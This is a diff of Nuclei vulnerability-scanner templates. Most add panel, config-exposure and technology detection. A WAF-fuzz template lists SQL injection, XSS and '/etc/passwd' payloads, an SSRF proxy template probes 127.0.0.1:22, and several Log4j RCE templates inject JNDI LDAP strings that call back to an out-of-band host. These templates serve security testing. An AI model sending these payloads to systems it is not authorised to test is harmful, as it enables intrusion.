Jedox is an Enterprise Performance Management software which is used for planning, analytics and reporting in finance and other areas such as sales, human resources and procurement.
reference:
- https://www.jedox.com
metadata:
max-req: 2
verified: "true"
shodan-query: title:"Jedox Web - Login"
google-query: intitle:"Jedox Web Login"
tags: panel,jedox,detect
http:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/ui/login/"
stop-at-first-match: true
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Jedox Web - Login"
- "guide-jedox-software"
condition: or
- type: status
status:
- 200

2
http/exposed-panels/sophos-web-appliance.yaml
View File

@ -12,7 +12,7 @@ info:
shodan-query: 'http.favicon.hash:-893681401'
tags: panel,login,sophos
requests:
http:
- method: GET
path:
- "{{BaseURL}}"

33
http/exposures/configs/platformio-ini.yaml Normal file
View File

@ -0,0 +1,33 @@
id: platformio-ini
info:
name: Platformio Config File Disclosure
author: DhiyaneshDK
severity: low
description: “platformio.ini” (Project Configuration File) was detected.
reference:
- https://docs.platformio.org/en/stable/projectconf/index.html
metadata:
max-request: 1
verified: "true"
google-query: inurl:"/platformio.ini"
github-query: '[platformio] language:INI'
tags: config,exposure,platformio
http:
- method: GET
path:
- "{{BaseURL}}/platformio.ini"
matchers-condition: and
matchers:
- type: word
words:
- "[platformio]"
- "platform ="
- "board ="
condition: and
- type: status
status:
- 200

33
http/exposures/logs/nginx-shards.yaml Normal file
View File

@ -0,0 +1,33 @@
id: nginx-shards
info:
name: NGINX Shards Disclosure
author: DhiyaneshDK
severity: medium
reference:
- https://infosecwriteups.com/how-i-got-rce-in-the-world-largest-russian-company-8e6e8288bc4e
metadata:
max-request: 2
shodan-query: html:"Welcome to Nginx"
tags: exposure,shards,nginx
http:
- method: GET
path:
- "{{BaseURL}}/static/shards.html"
- "{{BaseURL}}/static/shards/html"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "Logs"
- "Database"
- "online shards only"
condition: and
case-insensitive: true
- type: status
status:
- 200

44
http/fuzzing/ssrf-via-proxy.yaml Normal file
View File

@ -0,0 +1,44 @@
id: ssrf-via-proxy
info:
name: SSRF via Proxy Unsafe
author: geeknik,petergrifin
severity: unknown
reference:
- https://github.com/geeknik/the-nuclei-templates/blob/main/ssrf-by-proxy.yaml
- https://twitter.com/HusseiN98D/status/1649006265450782720
- https://twitter.com/ImoJOnDz/status/1649089777629827072
tags: ssrf,proxy,oast,fuzz
http:
- payloads:
verb:
- GET
- HEAD
- POST
- PUT
- DELETE
- CONNECT
- OPTIONS
- TRACE
- PATCH
raw:
- |+
{{verb}} http://127.0.0.1:22 HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
unsafe: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Protocol mismatch"
- "OpenSSH"
condition: and
- type: status
status:
- 200

794
http/fuzzing/waf-fuzz.yaml Normal file
View File

@ -0,0 +1,794 @@
id: waf-fuzz
info:
name: WAF Fuzzing
author: dwisiswant0,lu4nx,Myst7ic
severity: info
description: A web application firewall was detected.
reference:
- https://github.com/Ekultek/WhatWaf
classification:
cwe-id: CWE-200
tags: waf,tech,fuzz
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_={{whatwaf-payloads}}
- |
GET /?_={{whatwaf-payloads}} HTTP/1.1
Host: {{Hostname}}
payloads:
whatwaf-payloads:
- 484029\") AS xDKy WHERE 5427=5427 UNION ALL SELECT NULL,NULL
- \' AND 1=1 \'
- \'))) AND \'1\'=\'1\' (((\'
- AND 1=1
- \' AND 1=1 \' OR 10=11,<script>alert(\'\');</script>
- \"\"\' AND 1=1 \" OR 1=10 \'\"\"
- \' AND 1=1 OR 2=2
- \' AND 1=1 OR 2=2 \'
- \' )) AND 1=1 \' OR \'2\'=\'3 --\'
- \' AND 1=1 OR 24=25 \'
- \' AND 1=1 OR 9=10 ORDERBY(1,2,3,4,5)
- \' AND 1=1 ORDERBY(1,2,3,4,5) \'; asdf
- AND 1=1,<script>alert(\"1,2,3,4,5);</script>
- AND 1=1,<script>alert(\\"test\\");</script>
- \' AND 1=1;SELECT * FROM information_schema.tables \'
- AS start WHERE 1601=1601 UNION ALL SELECT NULL,NULL
- /bin/cat /etc/passwd
- <img src=x onerror=\\"input\\">
- r\"\"\"&\lt\' AND 1=1 \',<script>alert(\"test\");</script>\"\"\"
- <script>alert(\'1\');</script>
- <script>alert(1);</script>
- <script>alert(\"\");</script>
- <script>alert(\"test\");</script>
- <script>alert(\'test\');</script>
- \'/><script>alert(\'whatwaf\');</script>
- <script>alert(\\"XSS\\");</script>
- SELECT * FROM information_schema.tables
- SELECT user FROM information_schema.tables AND user = \'test user\';
- UNION SELECT * FROM users WHERE user = \'admin\';
stop-at-first-match: true
matchers:
- type: regex
name: instart
regex:
- '(?i)instartrequestid'
part: body
- type: regex
name: perimx
regex:
- '(?i)access.to.this.page.has.been.denied.because.we.believe.you.are.using.automation.tool'
- '(?i)http(s)?://(www.)?perimeterx.\w+.whywasiblocked'
- '(?i)perimeterx'
- '(?i)(..)?client.perimeterx.*/[a-zA-Z]{8,15}/*.*.js'
condition: or
part: response
- type: regex
name: webknight
regex:
- '(?i)\bwebknight'
- '(?i)webknight'
condition: or
part: response
- type: regex
name: zscaler
regex:
- '(?i)zscaler(.\d+(.\d+)?)?'
- '(?i)zscaler'
condition: or
part: response
- type: regex
name: fortigate
regex:
- '(?i).>powered.by.fortinet<.'
- '(?i).>fortigate.ips.sensor<.'
- '(?i)fortigate'
- '(?i).fgd_icon'
- '(?i)\AFORTIWAFSID='
- '(?i)application.blocked.'
- '(?i).fortiGate.application.control'
- '(?i)(http(s)?)?://\w+.fortinet(.\w+:)?'
- '(?i)fortigate.hostname'
- '(?i)the.page.cannot.be.displayed..please.contact.[^@]+@[^@]+\.[^@]+.for.additional.information'
condition: or
part: response
- type: regex
name: teros
regex:
- '(?i)st8(id|.wa|.wf)?.?(\d+|\w+)?'
condition: or
part: response
- type: regex
name: stricthttp
regex:
- '(?i)the.request.was.rejected.because.the.url.contained.a.potentially.malicious.string'
condition: or
part: response
- type: regex
name: stricthttp
regex:
- '(?i)rejected.by.url.scan'
- '(?i)/rejected.by.url.scan'
condition: or
part: response
- type: regex
name: shadowd
regex:
- '(?i)<h\d>\d{3}.forbidden<.h\d>'
- '(?i)request.forbidden.by.administrative.rules.'
condition: or
part: response
- type: regex
name: bigip
regex:
- '(?i)\ATS\w{4,}='
- '(?i)bigipserver(.i)?|bigipserverinternal'
- '(?i)^TS[a-zA-Z0-9]{3,8}='
- '(?i)BigIP|BIG-IP|BIGIP'
- '(?i)bigipserver'
condition: or
part: response
- type: regex
name: edgecast
regex:
- '(?i)\Aecdf'
condition: or
part: response
- type: regex
name: radware
regex:
- '(?i).\bcloudwebsec.radware.com\b.'
- '(?i).>unauthorized.activity.has.been.detected<.'
- '(?i)with.the.following.case.number.in.its.subject:.\d+.'
condition: or
part: response
- type: regex
name: varnish
regex:
- '(?i)varnish'
- '(?i).>.?security.by.cachewall.?<.'
- '(?i)cachewall'
- '(?i).>access.is.blocked.according.to.our.site.security.policy.<+'
condition: or
part: response
- type: regex
name: infosafe
regex:
- '(?i)infosafe'
- '(?i)by.(http(s)?(.//)?)?7i24.(com|net)'
- '(?i)infosafe.\d.\d'
- '(?i)var.infosafekey='
condition: or
part: response
- type: regex
name: aliyundun
regex:
- '(?i)error(s)?.aliyun(dun)?.(com|net)'
- '(?i)http(s)?://(www.)?aliyun.(com|net)'
condition: or
part: response
- type: regex
name: ats
regex:
- '(?i)(\()?apachetrafficserver((\/)?\d+(.\d+(.\d+)?)?)'
- '(?i)ats((\/)?(\d+(.\d+(.\d+)?)?))?'
condition: or
part: response
- type: regex
name: malcare
regex:
- '(?i)malcare'
- '(?i).>login.protection<.+.><.+>powered.by<.+.>(<.+.>)?(.?malcare.-.pro|blogvault)?'
- '(?i).>firewall<.+.><.+>powered.by<.+.>(<.+.>)?(.?malcare.-.pro|blogvault)?'
condition: or
part: response
- type: regex
name: wts
regex:
- '(?i)(<title>)?wts.wa(f)?(\w+(\w+(\w+)?)?)?'
part: response
- type: regex
name: dw
regex:
- '(?i)dw.inj.check'
part: response
- type: regex
name: denyall
regex:
- '(?i)\Acondition.intercepted'
- '(?i)\Asessioncookie='
condition: or
part: response
- type: regex
name: yunsuo
regex:
- '(?i)<img.class=.yunsuologo.'
- '(?i)yunsuo.session'
condition: or
part: response
- type: regex
name: litespeed
regex:
- '(?i)litespeed.web.server'
part: response
- type: regex
name: cloudfront
regex:
- '(?i)[a-zA-Z0-9]{,60}.cloudfront.net'
- '(?i)cloudfront'
- '(?i)x.amz.cf.id|nguardx'
condition: or
part: response
- type: regex
name: anyu
regex:
- '(?i)sorry.{1,2}your.access.has.been.intercept(ed)?.by.anyu'
- '(?i)anyu'
- '(?i)anyu-?.the.green.channel'
condition: or
part: response
- type: regex
name: googlewebservices
regex:
- '(?i)your.client.has.issued.a.malformed.or.illegal.request'
- '(?i)our.systems.have.detected.unusual.traffic'
- '(?i)block(ed)?.by.g.cloud.security.policy.+'
condition: or
part: response
- type: regex
name: didiyun
regex:
- '(?i)(http(s)?://)(sec-waf.|www.)?didi(static|yun)?.com(/static/cloudwafstatic)?'
- '(?i)didiyun'
condition: or
part: response
- type: regex
name: blockdos
regex:
- '(?i)blockdos\.net'
part: response
- type: regex
name: codeigniter
regex:
- '(?i)the.uri.you.submitted.has.disallowed.characters'
part: response
- type: regex
name: stingray
regex:
- '(?i)\AX-Mapping-'
part: response
- type: regex
name: west263
regex:
- '(?i)wt\d*cdn'
part: response
- type: regex
name: aws
regex:
- '(?i)<RequestId>[0-9a-zA-Z]{16,25}<.RequestId>'
- '(?i)<Error><Code>AccessDenied<.Code>'
- '(?i)x.amz.id.\d+'
- '(?i)x.amz.request.id'
condition: or
part: response
- type: regex
name: yundun
regex:
- '(?i)YUNDUN'
- '(?i)^yd.cookie='
- '(?i)http(s)?.//(www\.)?(\w+.)?yundun(.com)?'
- '(?i)<title>.403.forbidden:.access.is.denied.{0,2}<.{0,2}title>'
condition: or
part: response
- type: regex
name: barracuda
regex:
- '(?i)\Abarra.counter.session=?'
- '(?i)(\A|\b)?barracuda.'
- '(?i)barracuda.networks.{1,2}inc'
condition: or
part: response
- type: regex
name: dodenterpriseprotection
regex:
- '(?i)dod.enterprise.level.protection.system'
part: response
- type: regex
name: secupress
regex:
- '(?i)<h\d*>secupress<.'
- '(?i)block.id.{1,2}bad.url.contents.<.'
condition: or
part: response
- type: regex
name: aesecure
regex:
- '(?i)aesecure.denied.png'
part: response
- type: regex
name: incapsula
regex:
- '(?i)incap_ses|visid_incap'
- '(?i)incapsula'
- '(?i)incapsula.incident.id'
condition: or
part: response
- type: regex
name: nexusguard
regex:
- '(?i)nexus.?guard'
- '(?i)((http(s)?://)?speresources.)?nexusguard.com.wafpage'
condition: or
part: response
- type: regex
name: cloudflare
regex:
- '(?i)cloudflare.ray.id.|var.cloudflare.'
- '(?i)cloudflare.nginx'
- '(?i)..cfduid=([a-z0-9]{43})?'
- '(?i)cf[-|_]ray(..)?([0-9a-f]{16})?[-|_]?(dfw|iad)?'
- '(?i).>attention.required!.\|.cloudflare<.+'
- '(?i)http(s)?.//report.(uri.)?cloudflare.com(/cdn.cgi(.beacon/expect.ct)?)?'
- '(?i)ray.id'
- '(?i)__cfduid'
condition: or
part: response
- type: regex
name: akamai
regex:
- '(?i).>access.denied<.'
- '(?i)akamaighost'
- '(?i)ak.bmsc.'
condition: or
part: response
- type: regex
name: webseal
regex:
- '(?i)webseal.error.message.template'
- '(?i)webseal.server.received.an.invalid.http.request'
condition: or
part: response
- type: regex
name: dotdefender
regex:
- '(?i)dotdefender.blocked.your.request'
part: response
- type: regex
name: pk
regex:
- '(?i).>pkSecurityModule\W..\WSecurity.Alert<.'
- '(?i).http(s)?.//([w]{3})?.kitnetwork.\w'
- '(?i).>A.safety.critical.request.was.discovered.and.blocked.<.'
condition: or
part: response
- type: regex
name: expressionengine
regex:
- '(?i).>error.-.expressionengine<.'
- '(?i).>:.the.uri.you.submitted.has.disallowed.characters.<.'
- '(?i)invalid.(get|post).data'
condition: or
part: response
- type: regex
name: comodo
regex:
- '(?i)protected.by.comodo.waf'
part: response
- type: regex
name: ciscoacexml
regex:
- '(?i)ace.xml.gateway'
part: response
- type: regex
name: barikode
regex:
- '(?i).>barikode<.'
- '(?i)<h\d{1}>forbidden.access<.h\d{1}>'
condition: or
part: response
- type: regex
name: watchguard
regex:
- '(?i)(request.denied.by.)?watchguard.firewall'
- '(?i)watchguard(.technologies(.inc)?)?'
condition: or
part: response
- type: regex
name: binarysec
regex:
- '(?i)x.binarysec.via'
- '(?i)x.binarysec.nocache'
- '(?i)binarysec'
condition: or
part: response
- type: regex
name: bekchy
regex:
- '(?i)bekchy.(-.)?access.denied'
- '(?i)(http(s)?://)(www.)?bekchy.com(/report)?'
condition: or
part: response
- type: regex
name: bitninja
regex:
- '(?i)bitninja'
- '(?i)security.check.by.bitninja'
- '(?i).>visitor.anti(\S)?robot.validation<.'
condition: or
part: response
- type: regex
name: apachegeneric
regex:
- '(?i)apache'
- '(?i).>you.don.t.have.permission.to.access+'
- '(?i)was.not.found.on.this.server'
- '(?i)<address>apache/([\d+{1,2}](.[\d+]{1,2}(.[\d+]{1,3})?)?)?'
- '(?i)<title>403 Forbidden</title>'
condition: or
part: response
- type: regex
name: greywizard
regex:
- '(?i)greywizard(.\d.\d(.\d)?)?'
- '(?i)grey.wizard.block'
- '(?i)(http(s)?.//)?(\w+.)?greywizard.com'
- '(?i)grey.wizard'
condition: or
part: response
- type: regex
name: configserver
regex:
- '(?i).>the.firewall.on.this.server.is.blocking.your.connection.<+'
part: response
- type: regex
name: viettel
regex:
- '(?i)<title>access.denied(...)?viettel.waf</title>'
- '(?i)viettel.waf.system'
- '(?i)(http(s).//)?cloudrity.com(.vn)?'
condition: or
part: response
- type: regex
name: safedog
regex:
- '(?i)(http(s)?)?(://)?(www|404|bbs|\w+)?.safedog.\w'
- '(?i)waf(.?\d+.?\d+)'
condition: or
part: response
- type: regex
name: baidu
regex:
- '(?i)yunjiasu.nginx'
part: response
- type: regex
name: alertlogic
regex:
- '(?i).>requested.url.cannot.be.found<.'
- '(?i)proceed.to.homepage'
- '(?i)back.to.previous.page'
- "(?i)we('re|.are)?sorry.{1,2}but.the.page.you.are.looking.for.cannot"
- '(?i)reference.id.?'
- '(?i)page.has.either.been.removed.{1,2}renamed'
condition: or
part: response
- type: regex
name: armor
regex:
- '(?i)blocked.by.website.protection.from.armour'
part: response
- type: regex
name: dosarrest
regex:
- '(?i)dosarrest'
- '(?i)x.dis.request.id'
condition: or
part: response
- type: regex
name: paloalto
regex:
- 'has.been.blocked.in.accordance.with.company.policy'
- '.>Virus.Spyware.Download.Blocked<.'
condition: or
part: response
- type: regex
name: aspgeneric
regex:
- '(?i)this.generic.403.error.means.that.the.authenticated'
- '(?i)request.could.not.be.understood'
- '(?i)<.+>a.potentially.dangerous.request(.querystring)?.+'
- '(?i)runtime.error'
- '(?i).>a.potentially.dangerous.request.path.value.was.detected.from.the.client+'
- '(?i)asp.net.sessionid'
- '(?i)errordocument.to.handle.the.request'
- '(?i)an.application.error.occurred.on.the.server'
- '(?i)error.log.record.number'
- '(?i)error.page.might.contain.sensitive.information'
- "(?i)<.+>server.error.in.'/'.application.+"
- '(?i)\basp.net\b'
condition: or
part: response
- type: regex
name: powerful
regex:
- '(?i)Powerful Firewall'
- '(?i)http(s)?...tiny.cc.powerful.firewall'
condition: or
part: response
- type: regex
name: uewaf
regex:
- '(?i)http(s)?.//ucloud'
- '(?i)uewaf(.deny.pages)'
condition: or
part: response
- type: regex
name: janusec
regex:
- '(?i)janusec'
- '(?i)(http(s)?\W+(www.)?)?janusec.(com|net|org)'
condition: or
part: response
- type: regex
name: siteguard
regex:
- '(?i)>Powered.by.SiteGuard.Lite<'
- '(?i)refuse.to.browse'
condition: or
part: response
- type: regex
name: sonicwall
regex:
- '(?i)This.request.is.blocked.by.the.SonicWALL'
- '(?i)Dell.SonicWALL'
- '(?i)\bDell\b'
- '(?i)Web.Site.Blocked.+\bnsa.banner'
- '(?i)SonicWALL'
- '(?i).>policy.this.site.is.blocked<.'
condition: or
part: response
- type: regex
name: jiasule
regex:
- '(?i)^jsl(_)?tracking'
- '(?i)(__)?jsluid(=)?'
- '(?i)notice.jiasule'
- '(?i)(static|www|dynamic).jiasule.(com|net)'
condition: or
part: response
- type: regex
name: nginxgeneric
regex:
- '(?i)nginx'
- '(?i)you.do(not|n.t)?.have.permission.to.access.this.document'
condition: or
part: response
- type: regex
name: stackpath
regex:
- '(?i)action.that.triggered.the.service.and.blocked'
- '(?i)<h2>sorry,.you.have.been.blocked.?<.h2>'
condition: or
part: response
- type: regex
name: sabre
regex:
- '(?i)dxsupport@sabre.com'
part: response
- type: regex
name: wordfence
regex:
- '(?i)generated.by.wordfence'
- '(?i)your.access.to.this.site.has.been.limited'
- '(?i).>wordfence<.'
condition: or
part: response
- type: regex
name: '360'
regex:
- '(?i).wzws.waf.cgi.'
- '(?i)wangzhan\.360\.cn'
- '(?i)qianxin.waf'
- '(?i)360wzws'
- '(?i)transfer.is.blocked'
condition: or
part: response
- type: regex
name: asm
regex:
- '(?i)the.requested.url.was.rejected..please.consult.with.your.administrator.'
condition: or
part: response
- type: regex
name: rsfirewall
regex:
- '(?i)com.rsfirewall.403.forbidden'
- '(?i)com.rsfirewall.event'
- '(?i)(\b)?rsfirewall(\b)?'
- '(?i)rsfirewall'
condition: or
part: response
- type: regex
name: sucuri
regex:
- '(?i)access.denied.-.sucuri.website.firewall'
- '(?i)sucuri.webSite.firewall.-.cloudProxy.-.access.denied'
- '(?i)questions\?.+cloudproxy@sucuri\.net'
- '(?i)http(s)?.\/\/(cdn|supportx.)?sucuri(.net|com)?'
condition: or
part: response
- type: regex
name: airlock
regex:
- '(?i)\Aal[.-]?(sess|lb)=?'
part: response
- type: regex
name: xuanwudun
regex:
- '(?i)class=.(db)?waf.?(-row.)?>'
part: response
- type: regex
name: chuangyudun
regex:
- '(?i)(http(s)?.//(www.)?)?365cyd.(com|net)'
part: response
- type: regex
name: securesphere
regex:
- '(?i)<h2>error<.h2>'
- '(?i)<title>error<.title>'
- '(?i)<b>error<.b>'
- '(?i)<td.class="(errormessage|error)".height="[0-9]{1,3}".width="[0-9]{1,3}">'
- '(?i)the.incident.id.(is|number.is).'
- '(?i)page.cannot.be.displayed'
- '(?i)contact.support.for.additional.information'
condition: or
part: response
- type: regex
name: anquanbao
regex:
- '(?i).aqb_cc.error.'
part: response
- type: regex
name: modsecurity
regex:
- '(?i)ModSecurity|NYOB'
- '(?i)mod_security'
- '(?i)this.error.was.generated.by.mod.security'
- '(?i)web.server at'
- '(?i)page.you.are.(accessing|trying)?.(to|is)?.(access)?.(is|to)?.(restricted)?'
- '(?i)blocked.by.mod.security'
condition: or
part: response
- type: regex
name: modsecurityowasp
regex:
- '(?i)not.acceptable'
- '(?i)additionally\S.a.406.not.acceptable'
condition: or
part: response
- type: regex
name: squid
regex:
- '(?i)squid'
- '(?i)Access control configuration prevents'
- '(?i)X.Squid.Error'
condition: or
part: response
- type: regex
name: shieldsecurity
regex:
- '(?i)blocked.by.the.shield'
- '(?i)transgression(\(s\))?.against.this'
- '(?i)url.{1,2}form.or.cookie.data.wasn.t.appropriate'
condition: or
part: response
- type: regex
name: wallarm
regex:
- '(?i)nginix.wallarm'
part: response
- type: regex
part: response
name: huaweicloud
condition: and
regex:
- '(?)content="CloudWAF"'
- 'Server: CloudWAF'
- 'Set-Cookie: HWWAFSESID='
# Enhanced by Myst7ic on 2023/04/25

2
http/osint/mail-archive.yaml
View File

@ -12,7 +12,7 @@ info:
tags: osint,osint-coding,maillist
self-contained: true
requests:
http:
- method: GET
path:
- "https://www.mail-archive.com/search?l=all&q={{user}}"

9
http/takeovers/gemfury-takeover.yaml
View File

@ -2,19 +2,21 @@ id: gemfury-takeover
info:
name: Gemfury Takeover Detection
author: pdteam
author: pdteam,daffainfo
severity: high
reference:
- https://github.com/EdOverflow/can-i-take-over-xyz/issues/154
tags: takeover,gemfury
metadata:
max-request: 1
tags: takeover,gemfury
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 1
matchers-condition: and
matchers:
- type: dsl
@ -22,5 +24,6 @@ http:
- Host != ip
- type: word
part: header
words:
- "404: This page could not be found."
- "Location: https://gemfury.com/404"

15
http/technologies/favicon-detect.yaml
View File

@ -10,15 +10,21 @@ info:
- https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139
- https://github.com/devanshbatham/FavFreak
- https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv
tags: tech,favicon
metadata:
max-request: 1
max-request: 2
tags: tech,favicon
http:
- method: GET
path:
- "{{BaseURL}}/favicon.ico"
- "{{BaseURL}}/{{path}}favicon.ico"
payloads:
path:
- images/
stop-at-first-match: true
host-redirects: true
max-redirects: 2
@ -2657,3 +2663,8 @@ http:
name: "Vue.js"
dsl:
- "status_code==200 && (\"-1252041730\" == mmh3(base64_py(body)))"
- type: dsl
name: "Sophos Email Appliance"
dsl:
- "status_code==200 && (\"-830586692\" == mmh3(base64_py(body)))"

49
http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml Normal file
View File

@ -0,0 +1,49 @@
id: wordpress-gdpr-cookie-compliance
info:
name: GDPR Cookie Compliance (CCPA, DSGVO, Cookie Consent) Detection
author: ricardomaia
severity: info
reference:
- https://wordpress.org/plugins/gdpr-cookie-compliance/
metadata:
plugin_namespace: gdpr-cookie-compliance
wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
tags: tech,wordpress,wp-plugin,top-200
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/gdpr-cookie-compliance/readme.txt"
payloads:
last_version: helpers/wordpress/plugins/gdpr-cookie-compliance.txt
extractors:
- type: regex
part: body
internal: true
name: internal_detected_version
group: 1
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
- type: regex
part: body
name: detected_version
group: 1
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
matchers-condition: or
matchers:
- type: dsl
name: "outdated_version"
dsl:
- compare_versions(internal_detected_version, concat("< ", last_version))
- type: regex
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'

2
http/technologies/wordpress/plugins/sg-security.yaml
View File

@ -1,7 +1,7 @@
id: wordpress-sg-security
info:
name: SiteGround Security Detection
name: All-inclusive Security Solution by SiteGround Detection
author: ricardomaia
severity: info
reference:

2
http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml
View File

@ -20,7 +20,7 @@ info:
shodan-query: html:"Apache Druid"
tags: cve,cve2023,apache,druid,kafka,rce,jndi,oast
requests:
http:
- raw:
- |
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1

20
http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml
View File

@ -22,12 +22,16 @@ info:
shodan-query: http.html:"Apache OFBiz"
tags: cve,cve2021,ofbiz,oast,log4j,rce,apache,jndi,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
GET /webtools/control/main HTTP/1.1
Host: {{Hostname}}
Cookie: OFBiz.Visitor=${jndi:ldap://${hostName}.{{interactsh-url}}}
Cookie: OFBiz.Visitor=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookie.{{interactsh-url}}}
matchers-condition: and
matchers:
@ -39,13 +43,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/05/27

21
http/vulnerabilities/apache/apache-solr-log4j-rce.yaml
View File

@ -24,11 +24,15 @@ info:
shodan-query: http.html:"Apache Solr"
tags: vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@timeout: 25s
GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7Bsys%3Aos.name%7D.{{interactsh-url}}%2F%7D HTTP/1.1
GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-{{rand1}}%7D%24%7B%3A-{{rand2}}}%7D.%24%7BhostName%7D.uri.{{interactsh-url}}%2F%7D HTTP/1.1
Host: {{Hostname}}
attack: clusterbomb
@ -52,10 +56,21 @@ http:
- type: regex
part: interactsh_request
regex:
- '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # Windows or Linux
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # Windows or Linux
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

28
http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml
View File

@ -23,6 +23,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -32,7 +36,7 @@ http:
Referer: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password=
username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=
matchers-condition: and
matchers:
@ -41,21 +45,31 @@ http:
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- type: word
part: body
words:
- "<title>Jamf Pro Login</title>"
- type: regex
part: interactsh_request
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/05/27

16
http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml → http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml
View File

@ -22,13 +22,17 @@ info:
shodan-query: title:"CloudCenter Suite"
tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@timeout: 10s
POST /suite-auth/login HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */${jndi:ldap://${sys:os.name}.{{interactsh-url}}}
Accept: application/json, text/plain, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}
Content-Type: application/json
{"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"}
@ -43,7 +47,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
